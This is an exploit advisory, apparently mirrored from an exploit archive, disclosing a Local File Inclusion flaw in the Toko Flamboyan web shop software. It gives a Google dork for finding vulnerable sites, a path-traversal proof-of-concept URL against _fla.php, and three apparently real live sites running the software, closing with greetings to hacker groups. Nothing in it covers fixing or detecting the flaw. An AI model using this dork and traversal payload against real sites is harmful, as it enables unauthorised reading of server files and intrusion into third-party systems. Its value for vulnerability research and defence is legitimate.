id: 18800
date: 06/24/2012
title: Toko Flamboyan - Local File Inclusion
author: Dark-Puzzle
cves: 

# Exploit Title: Toko Flamboyan - Local File Inclusion
# Author: Dark-Puzzle
# Category : Webapps
# Vendor Homepage: http://www.flamboyan.co.id/
# Google Dork: inurl:"_fla.php?_fla="
# Date: 23 June 2012
# Vendor : Toko Flamboyan
# Version: All Versions 
# Tested on: Windows Xp Sp2 , Backtrack 5 .
-------------------------------------------------------------
Local File Inclusion :

Exploit Discovered in _fla.php

error :

www.example.com/_fla.php?_fla=..


PoC : 

www.example.com/_fla.php?_fla=../../../../../..[LFI]


http://www.flamboyan-hypermarket.com/_fla.php?_fla=kategori
http://rokok.web.id/_fla.php?_fla=produk
http://bogor.agen.biz/_fla.php?_fla=z_daftar_harga


Greetz To : Moroccan Cyber Army , Team-Hunter , Dr.Napst3r ...



#  0day.today [2023-03-24]  #